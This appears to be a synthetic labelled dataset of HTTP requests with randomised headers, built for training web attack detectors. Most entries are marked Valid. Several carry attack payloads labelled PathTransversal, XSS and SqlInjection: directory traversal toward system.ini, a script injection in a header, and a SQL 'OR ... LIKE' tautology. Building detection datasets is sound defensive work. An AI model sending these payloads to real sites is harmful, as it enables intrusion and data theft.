From: aaaaonr@hEtmerN4em.biz
If-Modified-Since: Mon, 23 Feb 04 09:14:47 GMT
If-Unmodified-Since: Thu, 29 Dec 05 03:34:39 UTC
If-Match: "VSvXNQiaZB5z@FlHvR."
If-None-Match: "o-8LlWKy4EzgBi2"
If-Range: Thu, 15 Apr 04 07:13:43 GMT
Max-Forwards: 96
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: crSDqa Lrjm6ejj=na0tra
Authorization: Basic c3BsT2Z5OnMyY2lQbWVu
Range: -63132
Referer: http://www.urtrg2.biz/necoo3x.png
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: eDsNgLWn@ http://www.erha.cz
UA-CPU: Sparc
UA-Disp: 045,174,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: 4.1 94.66.250.243, FTP/1.7 www.uzaruaa3.gif:04, FTP/3.0 9.235.110.103
Transfer-Encoding: gzip
Upgrade: i9y/2.0, idocae/0.1, xaekJa/4.4
Warning: 339 73.130.242.130:62488 "lUaiatecmaeewqtihoat" 
X-Forwarded-For: 218.201.111.222
X-Serial-Number: 55789
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29757
Start - Id: 24003
class: Valid
GET /Ys@phpvK/mfL07PzW@T/sAREKgu.CJm.-Y/Comdt7/nFe0SlJsN_.R/dsddgloesa/ojb7o2nba.jpeg?atnarbiikniexEo=staeutaeTe9r&etunYli0Ynneero=hsnon&oKdjt=ooIpcsmrad6%29and6&pts9mghomuhr=29206&ieesrAg=3wnht8a1n&egntY1r0leusn=Fdao&rbfnnR8oDGrov=400721 HTTP/1.1
Host: www.ttcatrmi.org
Connection: ea8tyr9d
Accept: application/postscript;q=0.3, image/png, image/gif;q=0.6
Accept-Charset: x-mac-chinesetrad, isiri-3342;q=0.5, koi8;q=0.3, shift_jis
Accept-Encoding: gzip;q=0.3, identity, deflate;q=0.3, compress
Accept-Language: pmeno-aissxdr, nd-r
Cache-Control: only-if-cached
Client-ip: 164.142.186.27
Cookie: 7opcae=oN8q;Kqscript@u1D=passwd0|;lutei=mJE3lhGXkV7l
Cookie2: $Version="905"
Date: Sat, 29 Dec 07 11:44:25 UTC
ETag: W/"tsyvamE5kv4yCK-6"
Expect: 100-continue
From: rESt9@oraehs.ch
If-Modified-Since: Wed, 17 Nov 04 02:37:37 CET
If-Unmodified-Since: Sat, 05 Jan 08 04:33:27 CET
If-Match: "NtZ7u1AQovpHvAUwmW@i"
If-None-Match: "UtjN8dHWIZY1.Zy8MaXN"
If-Range: Sun, 22 Apr 07 15:48:01 CET
Max-Forwards: 9
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: NTLM amFueWhoM2Vvam5ldG5uZWF6dGh3cXJ6Zm9lcnk4Y3VlMXRsdUE=
Range: 57-083666,74376-4577,088-
Referer: http://www.Ueeinlt.uk/ootbheO/jtsdtm/mEhlbnr/fdxt/nortis4.js
TE: gzip,trailers
Trailer: Date
User-Agent: cjew8bseH5a4
UA-CPU: PowerPC
UA-Disp: 041,336,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 603x2654
Via: deioro/9.0 www.epachus9.gif, 1.1 www.udrttoee.htm, wSwejn/9.0 www.arome.tiff
Transfer-Encoding: identity
Upgrade: rts9ij/5.7, 8dw/3.0, fp0id/1.5, htnane/8.5, drs/5.0
Warning: 674 www.rCinamAg.tiff "hotntasfbspfip" 
X-Forwarded-For: 218.161.129.191
X-Serial-Number: 54119
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 24003
Start - Id: 3581
class: Valid
GET /lPiANh9.bQ24/eXGf/eBwSjxMt/Rime6eios/neeAgqyr3xy7/esvpszn7ox9nO/aXfO8Pcw/eedimfoere6.jpg? HTTP/1.0
Host: www.u6rie3t.biz:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nthniPw-ogsRceSp, sfgoe-uge;q=0.6
Cache-Control: only-if-cached
Client-ip: 148.242.32.96
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="906"
Date: Mon, 18 Jun 07 20:54:38 GMT
ETag: W/"AKGnIz5yWE.QHcj4QR"
Expect: tamv=ox85;rgonuno=TtT9
From: ic6er@ToeneiH.uk
If-Modified-Since: Wed, 28 May 08 15:17:42 CET
If-Unmodified-Since: Tue, 18 Aug 09 01:05:12 UTC
If-Match: *
If-None-Match: "JEeeLvXV@BK0gGb_S39P"
If-Range: Fri, 20 Jan 06 22:05:17 GMT
Max-Forwards: 767
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: NTLM YXVyaXB0eTVBc2lDcmhNZWFjU2hhcmU5dGh0aWlydGE=
Range: 285-321592,-0,1-98
Referer: http://www.ddttac.st/yrDv/gekw/9uds/mrhugohe.php3
TE: gzip;q=0.7,chunked;q=0.0
Trailer: Pragma
User-Agent: nG_52il http://www.otstd.it
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x6463
Via: 8.5 www.ATisae3u.css, 3.2 www.aegdm.jpg
Transfer-Encoding: compress
Upgrade: ijka/6.6
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3581
Start - Id: 34939
class: Valid
PUT /i_0lPNxY_0pHgfb4YOL1/eS5T-tZND/stdin0imetahttpstA0/lkMpCb7FVOlHKi/cgdiefNejnAtjjRpaIt/o2DSol/arhbe.asmx? HTTP/1.0
Content-Length: 27
Content-Language: 9,ewsoeot
Content-Encoding: gzip
Content-Location: http://lXaunnr.com/eeacpk.js
Content-MD5: b2JkdjFpMGV0bm9ldHVkcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Mar 08 01:44:29 UTC
Last-Modified: Sat, 14 Aug 04 13:46:43 GMT
Host: www.oOh8eolple.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, cp-950;q=0.6
Accept-Encoding: compress;q=0.7, deflate
Accept-Language: haaonmc-yuA;q=0.5, rsthns-v, u-nbe;q=0.6
Cache-Control: min-fresh=095
Client-ip: 253.250.214.170
Cookie: Siuhwft96hdten=97973055;uAemshodueA=hepo
Cookie2: $Version="916"
Date: Fri, 27 Apr 07 10:31:55 CET
ETag: "Hqp6pur1VB41y-Y"
Expect: xiea
From: tiioeem4@dsjoesee6.it
If-Modified-Since: Sat, 10 Sep 05 12:24:22 GMT
If-Unmodified-Since: Wed, 18 Jun 08 23:48:17 UTC
If-Match: *
If-None-Match: *
If-Range: "xkj1qt4itSPGlB8MB"
Max-Forwards: 8543
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bXRCZWVhZXd1bmFpUW5tdlRhbHR0c2VvaW9BNGRkdG03d29hMjBnbQ==
Range: 26302-,-510,4934-
Referer: http://wmielso.biz/f8Q8e/eetiaim/stbmnj/tdsnlLo/dioapl.asp
TE: deflate
Trailer: If-None-Match
User-Agent: ra_FWs http://www.w0lnstq.uk
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 598x266
Via: 1.2 www.ahh7Gcm.jpeg
Transfer-Encoding: lfee; azintBr=elbse
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 837 www.kehN6nna.htm "8qpIoylmmte3l" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ypstelnet8WYC0OJtC=41590368

End - Id: 34939
Start - Id: 30906
class: Valid
GET /ndaoht/yLrt5zly0oq/mhFucmlAsns.htm?8NFULIBVjFIi=nHlep2srhIeu&6te2eThumsonnee=0797616&aeiq9K=yK9E&SdeutsY8=whTwsmwt&l3oi=2595305&tecYqylaa=o4qastpOu%28i%5B+processing-instruction%2FRtm&HhIG=ea%3Dvniiiofe1%7E&lthel=cc1ecsctm4d5Dt8&0sxrttry=ehaechooztlsl&JUvDmadminmopeny0dFp=5279&46ieesWct=4%27epte HTTP/1.0
Host: www.sqr4shd.uk:80
Connection: keep-alive
Accept: application/*;q=0.3, image/gif, image/*;q=0.5
Accept-Charset: windows-1257, iso-2022-kr;q=0.1, koi8-r;q=0.7, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: ufuorns='eatag'
Client-ip: 86.132.239.82
Cookie: DkorTvduetsdsm=eo;aistNnpTheo=aoz0Hoglocation noe;n3et=3us m;tuopAvT=hiform
Cookie2: $Version="965"
Date: Sat, 04 Sep 04 23:23:37 UTC
ETag: W/"AUAbhpcHv6fysclWU9kw"
Expect: ycestrfr
From: O35r@NAzet.cz
If-Modified-Since: Sun, 16 Jul 06 03:10:32 CET
If-Unmodified-Since: Mon, 19 Sep 05 04:47:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Oct 04 01:35:39 GMT
Max-Forwards: 12
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic c25lbDppZWRlbQ==
Authorization: Basic dG5pb2NobG46a0V0ZA==
Range: 7-19547,727449-
Referer: /ulomd/nels.tiff
TE: gzip;q=0.9,trailers,trailers
Trailer: If-Range
User-Agent: arvnstase6 (lU_wl5_NfV)
UA-CPU: MIPS
UA-Disp: 5927,611,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1031x1153
Via: 9.6 74.57.59.122, 4.6 248.67.26.133
Transfer-Encoding: gzip
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 364 www.n0ehr.css:691 "oEieijPwonreuaI" "Thu, 15 May 08 10:24:17 UTC"
X-Forwarded-For: 61.167.250.228
X-Serial-Number: 7053586525400090779
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30906
Start - Id: 17428
class: Valid
GET /Ytgor6chmii.htm? HTTP/1.0
Host: www.eezbofts.com
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, macintosh;q=0.6, koi8-r, x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: zarfnkre-art;q=0.4, xsg-ctejre, gyH-hcgad;q=0.2, soeycum-aUdte;q=0.3, nemptt-rtn;q=0.6
Cache-Control: no-cache
Client-ip: 191.27.170.192
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="3"
Date: Fri, 01 Apr 05 01:10:19 GMT
ETag: W/"mAiGWF_QY-nVfejmP-"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Sat, 14 Jan 06 02:46:44 UTC
If-Unmodified-Since: Tue, 01 Dec 09 12:42:33 GMT
If-Match: "Inhs3MZ.dLqr39yVUGWD"
If-None-Match: "nhci.t773B.ZUxHhfK"
If-Range: Wed, 01 Oct 08 18:53:09 CET
Max-Forwards: 8
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: NTLM bGl1YWNlbGVldUFzNnVFc3R0NXR3d3l0dW4zRXNlYXRlaXNzaG9tZW5oa3g=
Range: 8-
Referer: http://www.nI2i.de/OtZa/neaerdui/iTmm0rgG.gif
TE: gzip;q=0.1,chunked;q=0.9
Trailer: Trailer
User-Agent: dele6west/7.6.5.4.8
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: 7.5 www.nylhso.htm:9760, FTP/5.7 www.b37sr.tiff, FTP/8.2 152.115.162.180:14960
Transfer-Encoding: kslces; Rhw0=iDbe
Upgrade: tnn/6.0, dhp2e/7.9, 7eo/4.5, 6ei8oh/4.0
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17428
Start - Id: 3971
class: Valid
PUT /kjtFvJKqbXBlS.0d/8RwEJRRWq5oYy/TvKI_/x_Wb2orwhere/5admin/ufohlEwR/e3dHuEJv..rWM/REoiOa59mVerYsre/relc/ib.msf? HTTP/1.1
Content-Length: 30
Content-Language: pt,clmlo
Content-Encoding: compress
Content-Location: http://www.rsst.org/nntshh/tato/Adrvnr5c/sS44togl/mnmttrkr.mdb
Content-MD5: bDllc05ONnNuemhuenVraQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Sep 09 12:59:40 GMT
Last-Modified: Wed, 07 Apr 10 11:38:42 CET
Host: www.tnrNl8cp7r.de:80
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.3, compress;q=0.4, identity;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 0.103.85.93
Cookie: am8rl9l=Oh>rAu;Wue-E8l8=tRur;e2loon=199;uezetr=jfht
Cookie2: $Version="757"
Date: Thu, 10 Jul 08 17:57:26 CET
ETag: "VEWzPNSQWdwTr-4zJ"
Expect: 5dnhern=fet7
From: nlsirS@iuLqmfser.st
If-Modified-Since: Thu, 06 Jul 06 21:05:17 UTC
If-Unmodified-Since: Sat, 10 Apr 10 11:39:02 UTC
If-Match: "t-F0P7VF5xKAuWbK-P@Z"
If-None-Match: *
If-Range: "ndmfM8QmIPQkE-SMx8"
Max-Forwards: 4
MIME-Version: 2.6
Pragma: xsotyaaN=hdel8
Proxy-Authorization: Basic NEVpRTprZXJkMg==
Authorization: NTLM ZzQxYW9ncnJNeWxlc3RuclphY2ZjaWw2bmY2NHNuc2g2UWhjTWV5bg==
Range: -1776
Referer: /Ea1cmaRl/5jen/aonohzi.swf
TE: chunked;q=0.8,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: iO8fq2J34q http://www.zaaeeh.uk
UA-CPU: Sparc
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 881x617
Via: aciO/3.3 42.127.168.141, 2.9 www.AnaOM.css, sesko/3.5 171.227.136.83
Transfer-Encoding: identity
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 604 16.56.124.243:37484 "9ia6enlwgstuluh" 
X-Forwarded-For: 183.234.68.24
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

to=lqBQkM.qB&a1hwgqlzefh=5v As

End - Id: 3971
Start - Id: 11483
class: Valid
GET /safo_/yrn/a_0n/@Ziy10zJBG@/aGiUvXb/yevwLPM-mn9JQi.css?chdTee7eqM=nmsUeunDrluguh&WX5i5q=3&QHZMrcpG5jPlink=06&7R1g=535722 HTTP/1.1
Host: www.ytr8ot1hti.fr
Connection: keep-alive
Accept: text/*;q=0.5, text/*;q=0.1
Accept-Charset: koi8;q=0.3, iso-8859-8;q=0.6, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 170.41.229.75
Cookie: dlmzxtAsvsgtT=pBwEJKGGIB.T;ojd=01935;8blrsr9=ipK;flmalmc3s1hcm=Elmoesntm3ha3nf
Cookie2: $Version="2"
Date: Fri, 21 Aug 09 21:31:00 CET
ETag: "-3tmvwHH0fIma2usr84"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Thu, 11 Dec 08 01:37:21 GMT
If-Unmodified-Since: Fri, 16 Feb 07 05:21:00 GMT
If-Match: "8vJr4OOBEJzgU6Q"
If-None-Match: *
If-Range: "G-XSd-hRZ50ZFLIE"
Max-Forwards: 481
MIME-Version: 6.0
Pragma: reem='yahionlk'
Proxy-Authorization: Digest qop=ki3naiu
Authorization: Digest algorithm=MD5
Range: -517746,13-
Referer: /5nRhn/r6dee/eTMss/i3xiG/eMcd.tar.gz
TE: deflate;q=0.6
Trailer: From
User-Agent: Mozilla/3.1 (compatible; Konqueror/2.0; WinNT; leoa2; deud; Tunuhdy)
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: nt6/1.5 20.236.131.97, 0.0 www.kusw.htm:2741, 3.0 12.118.206.209
Transfer-Encoding: compress
Upgrade: ssb/3.4, dhoi/2.7, Ha2qy/1.5
Warning: 532 www.guwhhej.jpeg "fEoeeynUyaan2" "Sat, 12 Apr 08 24:22:20 UTC"
X-Forwarded-For: 93.142.43.86
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11483
Start - Id: 35968
class: PathTransversal
GET /vnzrzS74yiglesaJeatm/irlNccrlnopnehems/rcprxCJK1yC-Dj/ee6jntow0en6/6vksqAiframe@0SMFJA/e5bE/ktFe9q0xGkOFecho9h/i0R/D0@4-3B/geFHDdQi9vFegKvkYkXT/3GCA/hyshaea.jpg?t3rn=jehbr%3B%3Enunt+ut&ieEegdan=7296715&id=e%3Eoerui+i%3Dri&snsr7thddtsvEo=eL.Ws&Z_eMsciPLxp_X=82684707&ii6od8bisc=iaIc2DWrk&ltizodl2=XidaflhdotbE&aysrskRbe=gur0tswFtiCipnaei&e0idhtyllocgr4=nyheqneth&dqoaldlaSbSo=e%3Ah HTTP/1.0
Host: 253.255.43.231:83
Connection: reaI
Accept: text/xml, application/*, application/*
Accept-Encoding: *;q=0.8
Accept-Language: aa-cdsL;q=0.9, a-taooIx, eEctw-us;q=0.9, ub21ooa-nelhc, esn0-ecn
Cache-Control: no-store
Client-ip: 13.45.88.198
Cookie: pFhyhxth7o2po3n=..\..\..\..\..\..\WINDOWS\system.ini;9oE4nieeEukTf=e otr
Cookie2: $Version="784"
Date: Tue, 28 Mar 06 01:10:26 UTC
ETag: W/".z-2@ZfLD8wfVD2R5."
If-Unmodified-Since: Wed, 23 Apr 08 13:55:09 GMT
If-None-Match: *
Max-Forwards: 0752
Referer: http://p1eKj.de/oeic7cOn/thDnI/p0ih/nmonu.bin
Trailer: Accept
User-Agent: e5iCetole2 (byMDorK; yx_Z5wf; ca_Sjq3nr; ow_CtX)
----: ---------------------------

null

End - Id: 35968
Start - Id: 46587
class: XSS
GET /evKPW@N/_libSTCsn5/is1iAtSxddv/vrzOICwkVZd/gCl/dErvLuSvOg89ooCDTecG/se6ohkio2ds8u3odAe.php4?goeeiaqeuotgjro=ca%24cgtswddg7cr&iwriaovEoChe7=0&nw4pe=sincludet%26&oeach2hhr=3048364&xH_2x@T3U=AoEeairsifnnosOp&8cL_WPWgm=tab9&@u5K=%7CncsUe&82k=ESuuAt7idhgttoaHe&mh=2146&soetehgth3t=Reb&0sajralcuneseS=uxCaakalworpeiw&1ilr=i+ HTTP/1.1
Host: www.dqpyro0.be
Connection: close
Accept: image/gif;q=0.0, text/xml;q=0.5, audio/x-wav
Accept-Charset: euc-tw, iso-8859-1;q=0.4, euc-jp;q=0.1
Accept-Encoding: 
Accept-Language: <style    ><!--</style  ><script>[alert   ('noj0qiTP');]//--></script >
Cache-Control: no-cache
Client-ip: 222.227.138.4
Cookie: mfllds8d=usfot5;au9uo0o=B) n;ianng=sa;aDqX_bgsoundIlz=dsn
Cookie2: $Version="4"
Date: Mon, 09 Aug 04 24:11:36 GMT
ETag: W/"i_iTdQu4_UB@-BG"
Expect: 100-continue
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 29 Nov 09 09:29:21 GMT
If-Unmodified-Since: Wed, 05 Mar 08 06:18:52 CET
If-Match: *
If-None-Match: "uGpVkJJJCl2.SlLFX"
If-Range: Thu, 24 Aug 06 19:21:56 CET
Max-Forwards: 75
MIME-Version: 2.2
Pragma: 0=lcrb
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic bG9lajpvZXVyZQ==
Range: -65951,35-456894
Referer: http://www.csedxth.org/ldj8de/cgttoztm/d4oNtl/heOmf9.css
TE: gzip;q=0.2,gzip;q=0.1,gzip
Trailer: Expect
User-Agent: Mozilla/0.1 (Windows; U; Win98 5.3; et-et; rv:3.0.7) Gecko/13149045
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 3.3 207.232.122.195, gtrL/9.0 132.64.53.250
Transfer-Encoding: identity
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46587
Start - Id: 44781
class: PathTransversal
GET /e64sXOMTD1F/lltyry9/oprslDieEpnaolesuya/eaJqCKd/eQ3UcfRZ1hQBWOdU7I1r/riVnRBRlQ6xZBFWSwoTn.css?owqeE6gwsEejtsi=childrnph-%28rwt&jhsTmrniy=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F HTTP/1.1
Host: 242.236.230.198:80
Connection: close
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: *
Accept-Language: s0gt2ue-ys3tdiw;q=0.2, Hygl-h;q=0.1, gogeEcie-ike8cpi;q=0.2
Cache-Control: no-cache
Client-ip: 229.119.79.242
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="8"
Date: Fri, 14 Dec 07 19:52:43 UTC
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 17 Nov 09 22:15:16 CET
If-Unmodified-Since: Mon, 16 Feb 04 03:17:09 UTC
If-Match: "SRIM5uQDGsYbgJH"
If-None-Match: "kpwvyelLFc1LH0kyPV"
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 2935
MIME-Version: 2.7
Pragma: uha2omj=hhk
Proxy-Authorization: Digest realm
Authorization: NTLM bnZib2R0ZW45VFRXZXJFdDFyc0xvdHpzTW5hdGl2dGFlRWhl
Range: 8-
Referer: /rteNr/italtars/avlnaceo/tief.css
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: nteo7Is (dGedLwooRf; wqMcK5RqI)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44781
Start - Id: 21309
class: Valid
GET /cr2qwsX0/kXdPRR/xjnectoLtrEhita.png?blulon8qi40t9au=4571&hRtrtneie=Csrcp%3By&Q1Zv_I0havingZxp_Maccess_log=m+isp&aaeaeucPIl=io+&aqJ8FJ=wxFkXo9r&nnnoa=902&ysns4iearbetuqn=aG_doKn2RYdt&T8Nmei8c=e2NwlzIdwtuol&nHlibPVj=iEm%40q HTTP/1.0
Host: www.otrgvt.ch
Connection: sEdsfE
Accept: audio/x-wav, audio/*, audio/basic;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 130.22.25.249
Cookie: mqerm2=6800265;HNHechoZ2O1G=21952831;Opohh6d=oqn7e7rvea7eiufrph;eeluIahpwnw=230918280
Cookie2: $Version="03"
Date: Sat, 29 Mar 08 14:37:37 UTC
ETag: "VQfLFIu_RZQEkke2ut"
Expect: erdoHdf3=esho
From: 3toI@brgto.it
If-Modified-Since: Tue, 09 Feb 10 14:34:20 CET
If-Unmodified-Since: Thu, 11 Jun 09 09:59:42 UTC
If-Match: "BxMZIYEu.j5qa7h27W"
If-None-Match: "Pctx@PeENZZ@@CY"
If-Range: "S@3r5bVAgGl0OSvqZmSB"
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM cWk4eXZidG5pQXRsbm5saGRkZWVPeWViQXJhZGE3dDVpb3RwZXA=
Authorization: NTLM b29vc3lQdHV0R1RmeW90ZHRyb3RvZWVmZTh5dFhlYnBSbg==
Range: 863-
Referer: /4e0n3.fgf
TE: chunked;q=0.7,trailers,gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 2.4; ey-ol; rv:2.6.4) Gecko/85197674
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6998x4175
Via: 9.8 230.134.45.51, HTTP/5.4 www.nitboesa.html
Transfer-Encoding: deflate
Upgrade: tymurm/5.9, hhlRo/9.6, b96s/9.5
Warning: 371 www.eesb7.jpeg "lhwt" "Wed, 24 Sep 08 21:43:43 GMT"
X-Forwarded-For: 8.50.17.22
X-Serial-Number: 2418413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21309
Start - Id: 41395
class: SqlInjection
POST /eHchthwPgE5jboGKa8/oze@8x4GqatlZ/eeeooaieaVhu2twiIht/nhmeatihb/4o_5dl/IYZW7R3rcpG/3.XXcGO.jpg? HTTP/1.1
Content-Length: 150
Content-Language: tj1M,ee,icn
Content-Encoding: compress
Content-Location: /aaaao/m0ur.mspx
Content-MD5: bGVuVHJqdFRybXJ0bmkycQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: 112.227.181.141
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.2, x-mac-arabic;q=0.1, cp-932;q=0.2, hz-gb-2312
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 253.80.116.112
Cookie: zbinoGN= itgt;b1qasn=3066784;nbwka9K=022807;Jt.0tC=tneahyqasd;pyynTaeiphldf=ilbemereA;Dciae7aonoapn=536
Cookie2: $Version="59"
Date: Wed, 06 Oct 04 12:52:56 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: *
If-None-Match: "tG_FF.Vbh0_K-UJX"
If-Range: Mon, 30 May 05 24:56:27 CET
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=MD5
Range: 711-
Referer: /eLeaN/e5to/e8sseneo/rmfo/ebvTrsa.pl
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/3.8 (X11; U; SunOS sun4u 5.3; oo-a3; rv:2.2.1) Gecko/34668692
UA-CPU: 68000
UA-Disp: 5862,115,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1178x5140
Via: 2.1 243.39.231.192, mdvry6/6.3 www.eHe4.tiff
Transfer-Encoding: gzip
Upgrade: TCuaAo/6.0, eeey/6.4
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

styeunas=tlanddrenes+tdodbni&ixhdree=extaatYue&nuetspa='   OR     '1xo1seTu'    LIKE    'aze%25&Sea=nrc$&rrreCucg8= sock_streamatr=sth

End - Id: 41395
Start - Id: 3475
class: Valid
GET /noRcWTmaa4tndaOe/fbRpaFjU6I6bU/ezlhdkrto/4262yU7en4/bm/xv@Lccz0l/rroomat/utj/FPg3TyhJyO/5O3.oEXPnwinnt.7.msf?0i5efh=qtuo+&j3eaHnGuowehaso=83706481&N1=f HTTP/1.1
Host: 24.5.93.188:80
Connection: keep-alive
Accept: video/mpeg;q=0.7, text/xml, text/*
Accept-Charset: utf-8, windows-1258;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=06
Client-ip: 130.124.38.104
Cookie: p3NBztmpMmWA=4189;8WkNcQF=n7rjraodb6p;ryin=einputNve
Cookie2: $Version="918"
Date: Tue, 20 Dec 05 21:22:11 CET
ETag: W/"4W_Asm-QCrk-AoB"
Expect: oarlI
From: peuneie@adoc.be
If-Modified-Since: Thu, 07 Dec 06 20:15:08 UTC
If-Unmodified-Since: Sat, 01 Nov 08 04:15:14 UTC
If-Match: "uFl6K376xdDd0Uq2Jb5R"
If-None-Match: "SBHZO7fx_x2tj_i"
If-Range: *
Max-Forwards: 278
MIME-Version: 8.0
Pragma: Deti=nmurrsu
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: wOtl eyWou=apymeV
Range: -535,169-
